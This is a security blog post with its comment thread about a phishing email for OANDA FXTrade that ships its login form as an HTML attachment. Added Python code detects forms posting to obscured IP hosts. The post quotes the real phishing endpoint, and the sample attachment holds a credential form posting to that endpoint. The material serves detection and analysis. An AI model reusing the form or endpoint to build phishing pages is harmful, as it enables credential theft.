web application security lab

Phishing Site in Email

I was looking at a phishing email last night for OANDA FXTrade. At first glance I could see something a little different about it. Instead of linking directly to the phishing site in the email, it contained an attachment (an HTML file) that you are supposed to double click on. The page is a flat HTML page, with nothing of substance on it, other than a form that tries to get you to submit your data to http://0x47f865c1/webview/images/fxtrade.php (which automatically redirects you to the correct website if you go there directly).

That’s a fairly clever implementation of a phishing email, because the phishing page is actually on your local computer, not on the web. So it’s harder for anti-phishing researchers to find anything of interest on the remote computer, or even to verify that it is a phishing site. But I think I must be getting a little jaded, because as soon as I saw the HTML file I was actually disappointed. Clever as it is to ship the phishing site inside the HTML file, why on earth wouldn’t they put malicious code in it? Think about it: if someone is dumb enough to open an HTML file on their local computer, why wouldn’t you use it to install malware or something equally bad? To me it just seemed like a no-brainer. I suspect these malicious techniques will eventually converge, but for now, I don’t think the phishers understood exactly what power they had.
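The attachment described above is a useful triage case: the only thing on the page that matters is where the form posts, and the phisher wrote that host as a dotless hex IP (0x47f865c1, which is 71.248.101.193 in dotted form) rather than a name. The following helper is an added example, not code from the post or from OANDA; it parses an HTML attachment, pulls every form action, normalises obscured IPv4 hosts (hex, plain 32-bit decimal, leading-zero octal) to dotted quads, and flags any form that posts to an IP host or to a host outside the brand domain the mail claims to be from. The sample attachment is constructed for the example; only the form action URL and the prototype.js script URL come from the post and thread.

```python
"""Flag HTML email attachments whose forms post outside the impersonated brand.

Added example for triage; not part of the original post. Assumes the analyst
knows the brand domain (here "oanda.com") the mail is impersonating.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment. The form action and the script URL are the
# ones quoted on the page; the inputs and the second form are made up.
SAMPLE_ATTACHMENT = """
<html><head><title>FXTrade Login</title>
<script type="text/javascript"
 src="http://fxtrade.oanda.com/fileadmin/jslib/fxtrade/prototype.js"></script>
</head><body>
<form method="post" action="http://0x47f865c1/webview/images/fxtrade.php">
  <input name="username"><input name="password" type="password">
</form>
<form action="/search"><input name="q"></form>
</body></html>
"""


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> tag in the document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":  # HTMLParser lowercases tag and attribute names
            self.actions.append(dict(attrs).get("action"))


def normalize_host(host):
    """Return a dotted quad if `host` is an IPv4 address in dotted, 0xHEX,
    plain 32-bit decimal, or leading-zero octal form; else the host lowercased.
    """
    h = host.strip("[]").lower()
    try:
        return str(ipaddress.IPv4Address(h))  # already dotted decimal
    except ValueError:
        pass
    try:
        if h.startswith("0x"):
            n = int(h, 16)
        elif h.isdigit() and len(h) > 1 and h.startswith("0"):
            n = int(h, 8)
        elif h.isdigit():
            n = int(h, 10)
        else:
            return h
    except ValueError:
        return h
    if 0 <= n <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(n))
    return h


def classify_forms(html_text, brand_domain):
    """Return (raw_action, normalised_host, verdict) for each form found.

    Verdicts: "no-action", "relative" (no host; on a locally opened file this
    resolves to file:// and goes nowhere), "brand-host", "suspicious:ip-host",
    "suspicious:off-brand-host".
    """
    parser = FormActionCollector()
    parser.feed(html_text)
    results = []
    for action in parser.actions:
        if not action:
            results.append((action, None, "no-action"))
            continue
        parsed = urlparse(action)
        if not parsed.netloc:
            results.append((action, None, "relative"))
            continue
        host = normalize_host(parsed.hostname or "")
        try:
            ipaddress.IPv4Address(host)
            verdict = "suspicious:ip-host"
        except ValueError:
            if host == brand_domain or host.endswith("." + brand_domain):
                verdict = "brand-host"
            else:
                verdict = "suspicious:off-brand-host"
        results.append((action, host, verdict))
    return results


if __name__ == "__main__":
    for raw, host, verdict in classify_forms(SAMPLE_ATTACHMENT, "oanda.com"):
        print(f"{verdict:28} host={host!s:16} action={raw}")
```

The script tags pointing at the real fxtrade.oanda.com host are deliberately ignored: as the thread notes, a phishing page can load the genuine site's JavaScript and still post credentials elsewhere, so the form action, not the script sources, is the signal worth keying on.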

9 Responses to “Phishing Site in Email”

  1. Robert McMillan Says:

    Maybe they were worried about AV catching the malcode and blocking the phish?

  2. RSnake Says:

    Doubtful, it had links using <script src= in it, but they were all to the real site, e.g.:
    <script type="text/javascript" src="http://fxtrade.oanda.com/fileadmin/jslib/fxtrade/prototype.js"></script>

  3. thehorse13 Says:

    A lot of times when you see things that appear pretty clever yet pretty stupid at the same time, what you may have is a research phish. I’ve seen several that model after the one you found that later turned into blended threats as you stated.

  4. kuza55 Says:

    Maybe because in IE at least, html files opened from the web are rendered in the context of the domain they were opened from, and most webmail providers are filtering script (though I think they may still let forms through), however this protection doesn’t apply if you save the file, then open it manually.

    Also, I don’t see how you can call users dumb for downloading and opening html files, I’d rather call the developers who came up with all the dangerous filetypes other than .exe files stupid.

  5. sana Says:

    It seems pretty obvious to me.
    Putting malicious code = AntiVirus alarms = phishing failure

    ;)

  6. RSnake Says:

    @sana - that’s possible since the user does have to somehow download the JavaScript. But as we all know there are hundreds of ways to obfuscate JavaScript that can get past AV filters, so I think that’s a pretty weak reason unless you really have no idea what you’re doing as an attacker.

  7. Skuld Says:

    It might have something to do with zones in ie7. I don’t remember how it worked in ie6 but every time I have to open a local htm file in ie7 that has javascript or uses some activex control it gives a security bar at the top that I have to enable. I know attacks have been done in the past that use social engineering to get people to allow this anyway, but I find most of the people using exploits try to avoid things that require any user interaction beyond opening it.

  8. RSnake Says:

    @skuld - I doubt that’s the reason, since it already had JS in it, just the valid site’s JS.

  9. MustLive Says:

    Guys.

    Putting the whole phishing site into the email - it’s one attack technique. There is another (which I found this year) - phishing site in the link.

    I wrote about it some time ago in my article Cross-Site Scripting attacks via redirectors. With this attack technique you can use redirection services such as TinyURL for phishing and malware spreading.